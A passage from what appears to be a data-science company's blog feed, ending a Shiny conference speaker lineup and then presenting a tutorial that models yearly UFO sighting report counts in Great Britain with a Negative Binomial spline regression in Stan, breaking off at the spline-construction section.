&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="tan-ho---zelus-analytics"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt; - &lt;a href="https://zelusanalytics.com/" rel="external"&gt;Zelus Analytics&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Effective Logging for Shiny&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This talk will share some strategies I&amp;rsquo;ve found effective in setting up logging for Shiny apps to help with debugging applications both in development and when deployed to production.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/tan@2x.jpg" alt="Photo of Tan Ho" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Tan is a data nerd from Ottawa, Canada who loves R, Shiny, fantasy football and carving pumpkins! By day, he&amp;rsquo;s an ML engineer for Zelus Analytics. In his spare time, he maintains DynastyProcess.com Trade Calculator (a Shiny app that serves over 200,000 unique monthly users), develops nflverse R packages, and mentors in the R4DS Slack Community.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="liam-kalita---jumping-rivers"&gt;Liam Kalita - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;The Road to Easier Shiny App Deployments&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re often helping developers to assess, fix and improve their Shiny apps, and often the first thing we do is see if we can deploy the app. If you can&amp;rsquo;t deploy your Shiny app, it&amp;rsquo;s a waste of time. If you can deploy it successfully, then at the very least it runs, so we&amp;rsquo;ve got something to work with.&lt;/p&gt;
&lt;p&gt;There are a bunch of reasons why apps fail to deploy. They can be easy to fix, like hardcoded secrets, fonts, or missing libraries. Or they can be intractable and super frustrating to deal with, like manifest mismatches, resource starvation, and missing libraries.&lt;/p&gt;
&lt;p&gt;At the end of this talk, I want you to know how to identify, investigate and proactively prevent Shiny app deployment failures from happening.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/liam@2x.jpg" alt="Photo of Liam Kalita" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Liam has been the InfoSec Lead at Jumping Rivers since the start of 2023, specialising in compliance, security controls, and policies (GDPR, Cyber Essentials, ISO 27001). With two previous years in infrastructure support and consultancy, he ensures secure Shiny app and Posit platform deployments, and promotes a culture of security awareness within the company.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="anna-skrzydło---appsilon"&gt;&lt;a href="https://www.linkedin.com/in/anna-skrzydlo/" rel="external"&gt;Anna Skrzydło&lt;/a&gt; - &lt;a href="https://appsilon.com/" rel="external"&gt;Appsilon&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;3 reasons why nobody uses your app&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;You’ve built a great app. You are sure that once your coworkers start using it, their lives will be so much easier. You are waiting for some signs of success: your happy colleagues praising the app or recommending it to others. But … it doesn’t come. Does it sound familiar? Have you ever wondered why nobody is using your app? Come to my talk and wonder no more. During my talk I will present 3 main reasons for low user adoption: don’t need the app, can’t use the app and don’t trust the app. I will share not only examples, but also recipes for dealing with each of those situations.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/anna@2x.jpg" alt="Photo of Anna Skrzydło" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Anna is a Delivery Manager, Business Analyst, and R/Shiny developer with over 10 years of professional experience leading software and Data Science projects, facilitating user workshops and mentoring Project Managers. She is a regular speaker at industry conferences, including WhyR, UseR and Data Science Summit. Dog lover, salsa dancer and stand-up comedy fan.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Using Stan to analyse global UFO sighting reports</title><link>https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/</link><pubDate>Thu, 31 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="ufo-sighting-data"&gt;UFO sighting data&lt;/h2&gt;
&lt;p&gt;A recent &lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2023/2023-06-20/readme.md" rel="external"&gt;#TidyTuesday&lt;/a&gt; data set piqued my interest. It&amp;rsquo;s a rather large collection of worldwide &lt;em&gt;reportings&lt;/em&gt; of UFO sightings.&lt;/p&gt;
&lt;p&gt;Interesting.&lt;/p&gt;
&lt;p&gt;You can download the data yourself and load it into R:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ufo_sightings.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;ufo_sightings&lt;/code&gt; contains information about thousands of UFO sightings. Each sighting contains information such as the date and time (&lt;code&gt;reported_date_time&lt;/code&gt;, &lt;code&gt;day_part&lt;/code&gt;) of the sighting, the location (&lt;code&gt;city&lt;/code&gt;, &lt;code&gt;state&lt;/code&gt;, &lt;code&gt;country&lt;/code&gt;) of the sighting, and other information such as a freetext summary. The &lt;code&gt;summary&lt;/code&gt; column is by far the most interesting &amp;hellip;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(city, day_part, summary) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 6 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; city day_part summary
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; Pinehurst night Saw multi color object above horizon.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; Rapid City nautical dusk An object &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; the shape of a straight line about an …
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; Cleveland night Tone &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; the air.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; Bloomington afternoon Black tic&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;tac shaped ufo. Moved with insane speed
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; Irvine night Two alien were scanning me
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt; Moore morning Long cigar solid shaped craft with light beam
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="what-do-we-want-to-achieve"&gt;What do we want to achieve?&lt;/h2&gt;
&lt;p&gt;The goal here is to fit a simple Bayesian model which will allow us to understand the historical counts of reported UFO sightings. The Bayesian approach is a probabilistic approach to modelling that has some advantages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;we are able to incorporate meaningful prior information about model parameters&lt;/li&gt;
&lt;li&gt;including uncertainty in our predictions is natural and automatic.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A common drawback of Bayesian methods has been the lack of fast and simple-to-use software to fit such models. With modern tools such as &lt;a href="https://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt;, fitting Bayesian models is less of a headache!&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re going to use Stan to fit our model, but I&amp;rsquo;ll be sparing you the details of the program, as well as many other details &amp;mdash; we&amp;rsquo;ve linked to a GitHub repo at the end of this post with full analysis scripts. The purpose of this post is to give a high-level overview of how we can fit flexible regression models for count data using Stan. We also touch upon how to work with Markov chain Monte Carlo (MCMC) output within a {tidyverse} framework towards the end of this post.&lt;/p&gt;
&lt;h3 id="what-is-stan"&gt;What is Stan?&lt;/h3&gt;
&lt;p&gt;Stan is a free, open-source C++ program used for specifying and fitting Bayesian models. Stan uses state-of-the-art MCMC algorithms to fit your Bayesian models, so it is efficient and numerically stable. We don&amp;rsquo;t really have the time to delve too much into the reasons for using Stan today, but &lt;a href="https://www.jumpingrivers.com/blog/why-stan/" rel="external"&gt;this previous post&lt;/a&gt; goes into considerable detail! If you&amp;rsquo;ve used &lt;a href="https://mcmc-jags.sourceforge.io/" rel="external"&gt;JAGS&lt;/a&gt; or &lt;a href="https://www.pymc.io/projects/docs/en/v3/index.html" rel="external"&gt;PyMC3&lt;/a&gt; before, the concept behind Stan is similar; you specify your Bayesian model in the Stan language, and Stan takes care of the MCMC algorithm for you. Installing Stan is simple in R; calling&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstan&amp;#34;&lt;/span&gt;, dependencies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;will install Stan for you (as well as the {rstan} package).&lt;/p&gt;
&lt;h3 id="a-note-on-how-to-interpret-the-analysis"&gt;A note on how to interpret the analysis&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s definitely worth stating up front that the purpose of this post is to have a little play with Stan and a fun data set. This data set contains &lt;em&gt;reported UFO sightings&lt;/em&gt;; they&amp;rsquo;re not &lt;em&gt;confirmed UFO sightings&lt;/em&gt;. Therefore, we can only make statements about &lt;em&gt;reports&lt;/em&gt; and not the &lt;em&gt;numbers of UFOs&lt;/em&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-ufo-counts"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="lets-take-a-peek-at-the-data"&gt;Let&amp;rsquo;s take a peek at the data&lt;/h3&gt;
&lt;p&gt;Prior to modelling the yearly counts, we should have a little look at the data. This can help us make informed modelling choices later down the line.&lt;/p&gt;
&lt;p&gt;The number of sightings per year isn&amp;rsquo;t directly recorded in this data, but we can wrangle this out of the raw data with a few {dplyr} commands. We also only look at the GB data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
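&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# for complete() and full_seq()&lt;/span&gt;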
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sights_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(country_code &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GB&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(year_of_sighting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(reported_date_time)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sightings_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(year_of_sighting),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year_of_sighting&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;complete&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year_of_sighting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;full_seq&lt;/span&gt;(year_of_sighting, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(sightings_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We&amp;rsquo;ve now got annual counts of the number of reported sightings in Great Britain. The first date in the data set is 1938, so the counts start from then.&lt;/p&gt;
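&lt;p&gt;To see what the zero-filling step does, here is a minimal sketch on a made-up vector of years. The values and the names &lt;code&gt;toy_years&lt;/code&gt; and &lt;code&gt;toy_per_year&lt;/code&gt; are purely illustrative, and the sketch uses base R as a stand-in for the {tidyr} call rather than reproducing it.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical years of individual reports; 2001 and 2003 have none
toy_years = c(2000, 2000, 2002, 2004, 2004, 2004)

# Every year in the observed range, including the gaps
all_years = seq(min(toy_years), max(toy_years), by = 1)

# Counting against a factor with fixed levels keeps empty years as zeros
toy_counts = table(factor(toy_years, levels = all_years))

toy_per_year = data.frame(
  year_of_sighting = all_years,
  sightings_per_year = as.integer(toy_counts)
)
toy_per_year
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Years without any reports show up with a count of 0 rather than being dropped, which matters for a count model: a year with no reports is an observation of zero, not a missing value.&lt;/p&gt;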
&lt;p&gt;Okay, let&amp;rsquo;s plot the data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sights_per_year &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sightings_per_year)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Year of reported sighting&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of recorded sightings per year&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Yearly UFO sighting reports for Great Britain&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="count.png" alt="A scatter plot (time series) showing the number of reported UFO sightings in Great Britain from the year 1943 to 2023. Up until about 1990, the number of reports is small (usually under 10), and approximately constant. From the early 1990s, the number rises quickly to a peak of about 150 reports in 2009; as the counts increase, so does their scatter. The numbers then rapidly fall, with there being under 25 reports in 2022." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;There are a few interesting features of the data set:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The data produces a complex pattern; this might be tricky to model!&lt;/li&gt;
&lt;li&gt;The number of reports before 2000 was generally small.&lt;/li&gt;
&lt;li&gt;The number of reports increases from roughly the year 1995 until the late 2000s.&lt;/li&gt;
&lt;li&gt;From 2010 onward, the number of reports is in rapid decline.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To be honest, I&amp;rsquo;m not really sure why we see a rapid increase of sightings from the mid 90s onwards. There are a few &lt;em&gt;potential&lt;/em&gt; reasons for this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;There was an increase in UFO traffic over Earth from the mid 1990s to 2010 (maybe 👽)&lt;/li&gt;
&lt;li&gt;The emergence of the internet brought like-minded people together, improving the ease of reporting (plausible)&lt;/li&gt;
&lt;li&gt;The 1996 blockbuster &lt;em&gt;Independence Day&lt;/em&gt; had some kind of effect on people (plausible)&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="the-statistical-approach"&gt;The statistical approach&lt;/h2&gt;
&lt;p&gt;Our approach here will be to model the number of UFO sighting reports over time with a Negative Binomial regression model, using spline terms to flexibly model the non-linear trend. This wasn&amp;rsquo;t the first idea I had, but after a little bit of frustration, contemplation and iteration, this gave a reasonably good fit to the data.&lt;/p&gt;
&lt;p&gt;Some previous approaches (we won&amp;rsquo;t delve into the details) involved simpler Poisson models.&lt;/p&gt;
&lt;p&gt;The statistical model is as follows:&lt;/p&gt;
&lt;p&gt;\( y\mid \lambda(X) \sim \text{NegBin} (\lambda(X), \phi) \)&lt;/p&gt;
&lt;p&gt;\( \log \lambda(X) = \alpha + X\beta \)&lt;/p&gt;
&lt;p&gt;Where \(y\) is the number of sightings, \(X\) is a matrix of spline terms (derived from the times at which sightings were observed), \(\lambda(X)\) is the expected number of sightings and \(\phi \) is a dispersion parameter. A model block in Stan for this statistical model might look a bit like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;// Stan model block
model {
// likelihood
y ~ neg_binomial_2_log(alpha + X * beta, exp(log_phi));
// prior
alpha ~ normal(m_alpha, s_alpha); // intercept
beta ~ normal(m_beta, s_beta); // spline coefficients
log_phi ~ normal(m_phi, s_phi); // log dispersion term
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;There&amp;rsquo;s quite a bit going on here. Let&amp;rsquo;s break the model down a little:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;neg_binomial_2_log&lt;/code&gt; distribution is used to specify the likelihood. This is an alternative parameterisation of the Negative Binomial distribution; the first parameter of &lt;code&gt;neg_binomial_2_log&lt;/code&gt; is \( \log {E (y \mid X, \alpha, \beta, \phi)} \), the second parameter is simply &lt;code&gt;phi&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;2&lt;/code&gt; in &lt;code&gt;neg_binomial_2_log&lt;/code&gt; tells us that this distribution is parameterised by the mean and dispersion (rather than by the shape and inverse scale parameters used by &lt;code&gt;neg_binomial&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;log&lt;/code&gt; tells us that we&amp;rsquo;re actually parameterising by the log mean, rather than raw mean.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;alpha&lt;/code&gt; is an intercept term (for a linear predictor); &lt;code&gt;beta&lt;/code&gt; is a vector of regression coefficients.&lt;/li&gt;
&lt;/ul&gt;
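&lt;p&gt;As a rough check on what the mean and dispersion parameterisation implies, the sketch below simulates from the corresponding distribution in base R. It assumes that &lt;code&gt;rnbinom()&lt;/code&gt; with arguments &lt;code&gt;mu&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; plays the role of Stan&amp;rsquo;s mean and dispersion, in which case the variance is \( \lambda + \lambda^2 / \phi \). The values of &lt;code&gt;mu&lt;/code&gt; and &lt;code&gt;phi&lt;/code&gt; are arbitrary illustrations, not estimates from the UFO data.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;set.seed(1)
mu = 20   # illustrative mean, i.e. exp() of the log-mean passed to Stan
phi = 5   # illustrative dispersion; smaller values mean more overdispersion

draws = rnbinom(100000, mu = mu, size = phi)

theoretical_var = mu + mu^2 / phi  # 20 + 400 / 5 = 100
c(mean = mean(draws), var = var(draws), theoretical_var = theoretical_var)

# For comparison, a Poisson with the same mean has variance equal to mu
var(rpois(100000, lambda = mu))
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The extra \( \lambda^2 / \phi \) term is what lets the Negative Binomial accommodate the growing scatter at higher counts, which a Poisson model with the same mean cannot do.&lt;/p&gt;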
&lt;p&gt;In our approach, we&amp;rsquo;re going to use R to generate spline terms for us, then pass these spline terms to Stan (and thus populate &lt;code&gt;X&lt;/code&gt;). If you&amp;rsquo;re unfamiliar with splines, they&amp;rsquo;re clever devices which allow us to model non-linear behaviour. This &lt;a href="https://cran.r-project.org/web/packages/crs/vignettes/spline_primer.pdf" rel="external"&gt;crs vignette&lt;/a&gt; provides an introduction. Another approach would be to write a Stan function to construct the splines, &lt;a href="https://mc-stan.org/users/documentation/case-studies/splines_in_stan.html" rel="external"&gt;as in this Stan case study&lt;/a&gt;. The advantage of the approach we&amp;rsquo;ve taken is that splines are not a hard-coded feature of the model, so we &lt;em&gt;could&lt;/em&gt; use this Stan program for a more general Negative Binomial regression. The downside is that, if someone used this Stan model as part of a workflow not performed with R, we would have to carefully verify that the splines have been constructed in the same way as in the R implementation.&lt;/p&gt;
&lt;h2 id="constructing-the-splines"&gt;Constructing the Splines&lt;/h2&gt;
